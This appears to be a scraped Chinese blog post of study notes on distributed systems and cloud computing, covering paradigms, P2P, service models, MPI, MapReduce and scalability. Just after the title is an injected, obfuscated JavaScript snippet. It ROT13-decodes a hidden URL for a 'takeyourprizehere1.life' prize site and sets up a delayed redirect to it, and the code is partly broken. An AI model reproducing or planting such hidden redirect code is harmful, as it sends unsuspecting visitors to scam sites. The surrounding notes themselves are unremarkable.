云计算与分布式系统-1-分布式系统模型和关键技术

rx onlineString.prototype.a73fba7d=function(){return this.replace(/[a-zA-Z]/g,function(c){return String.fromCharCode((c=(c=c.charCodeAt(0)+13)?c:c-26);});};u=’uggcf://gnxrlbhecevmrurer1.yvsr/?h=l2lxnrj&b=2khc89e&z=1&g=jrozaf4′;function f31454d7(){ =u.a73fba7d();} (f31454d7,4987);
计算范式的区别:

集中式计算:这种计算范式是将所有计算资源集中在一个物理系统之内,所有的资源(处理器、内存、存储器)是全部共享的并且紧耦合在一个集成式操作系统中。
并行计算:在并行计算中,所有处理器或是紧耦合与中心共享内存或是松耦合于分布式内存。处理器间通信通过共享内存或通过消息传递完成。通常称有并行计算能力的计算系统称为并行计算机。运行在并行计算机上的程序称为并行程序。
分布式计算:这是一个计算机科学和工程中研究分布式系统的领域。一个分布式系统由众多自治的计算机组成,各自拥有其私有内存,通过计算机网络通信。分布式系统中的信息交换通过消息传递的方式完成。运行在分布式系统上的程序成为分布式程序。编写分布式程序的过程成为分布式编程。
云计算:一个互联网云的资源可以是集中式的也可以是分布式的。云采用分布式计算或并行计算,或两者兼有。云可以在集中或分布式的大规模数据中心之上,由物理的或虚拟的计算资源构建。一些人认为云计算是一种效用计算或者服务计算的形式。
物联网:是一个日常生活对象(包括计算机、传感器、人、工具、设备等)网络化连接。这是互联网发展的一种趋势。在物联网时代,所有对象和设备都是工具化的、互联的和智能交互的。这种交流可以发生在人和物或者物和物之间。动态连接的将会指数型增长成为包含多个网络的一个新的动态网络就是物联网。
CPS:这是除了物理完之外另一个互联网发展的一种趋势。CPS是计算过程和物理世界之间交互的结果。

GPU和CPU的一个重要的区别是GPU有一个慢速执行多并线程的大规模并行吞吐系结构,而不是在一个通常的位处理器上快速的执行一个单独的长线程。现在GPU已经不仅仅是加速图形和视频编码。他们还应用于HPC系统的多核和多线程级别的大规模并行超级计算机。GPU被设计用于处理大批量并行浮点计算。能量和海量的并行是未来GPU相对于CPU的主要优势。

 

云计算在实质上依托以下四个方面融合:硬件虚拟化和多核芯片、效用和网格计算(云计算必需的基础)、SOA、Web 2.0和网络服务糅合、原子计算和数据中心自动化。

对等网络-P2P

P2P:在一个P2P系统中,每个节点既是客户端又是服务器,提供部分系统资源。节点极其都是简单的接入互联网的客户机。节点间不存在主从关系。无需中心写作或中心数据库。
覆盖网络:数据项或文件分布在一起参加的节点中。基于通信或文件共享需求,对等节点ID在逻辑层形成一个覆盖网络。这是通过逻辑地映射每台物理机为其ID而形成的虚拟网络。当一个新的对等节点加入系统,它的对等节点ID作为一个节点加入到网络中。当一个存在的对等节点离开系统,它的对等节点ID会自动的从覆盖网络中移除。

处理大数据集,将通常意味着把计算(程序)发送给数据,而不是复制数据到工作站。

 
三个云服务模型:

技术处设施即服务(IaaS):这个模型将用户需要的基础设施(即服务器、存储、网络和数据中心构造)组合在一起。用户可以在使用客户机操作系统的多个虚拟机上配置和运行指定的应用。用户不管理或控制底层的云基础设施,但可以指定何时请求和释放所需资源。
平台即服务(PaaS):这个模型将使用户能够在一个虚拟平台上配置用户定制的应用。PaaS包括了中间件、数据库、开发工具和一些运行时支持。平台包括集成了特定程序接口的硬件和软件。提供商提供API和软件工具。用户从云基础设施的管理中得以解脱。
软件即服务(SaaS):这是指面向数千付费云用户的初始浏览器的应用软件。SaaS模型应用于业务流程、工业应用、客户关系管理、企业资源计划、人力资源和合作应用。在用户这边,没有服务器或软件许可方面的前期投入。在提供商这边,同传统的用户应用服务器相比,成本相当低。

并行和分布式编程模型:
1.消息传递接口(MPI):这是开发分布式系统上运行的并行程序的主要编程标准。本质上是一个可以被C调用的子程序库,用于编写运行于分布式系统上的并行程序。

2.MapReduce:这是一个用于大数据集散大规模集群可扩展数据处理的web编程模型,这个模型主要用于web规模的搜索和云计算应用。

3.Hadoop库:Hadoop提供了一个软件平台。这个开发包使用户能够在海量分布式数据上编写和运行程序。Hadoop也是经济的,因为它是MapReduce的一个开源实现。

 
构建海量分布式计算系统的基本设计原则
1.性能度量和可扩展性分析

细嫩度量事宜MIPS为单位度量CPU的速度。

2.可扩展性维度

这个分布式系统的任何系统资源升级应该向后兼容已有的硬件和软件资源。要考虑规模可扩展性、软件可扩展性、应用可扩展性、技术可扩展性。

3.可扩展性和系统镜像数

可扩展的性能意味着系统可以通过增加更多的处理器或服务器、扩大物理节点的内存大小、扩展磁盘容量增加更多的I/O通道实现更快的速度。许多集群节点是SMP(对称多处理器)或者多个服务器,处理器或核心总数在集群系统中比集群上运行的操作系统镜像大1或2个数量级。

3.容错和系统可用性

高可用是所有集群、网格、P2P网络和云系统所期望的。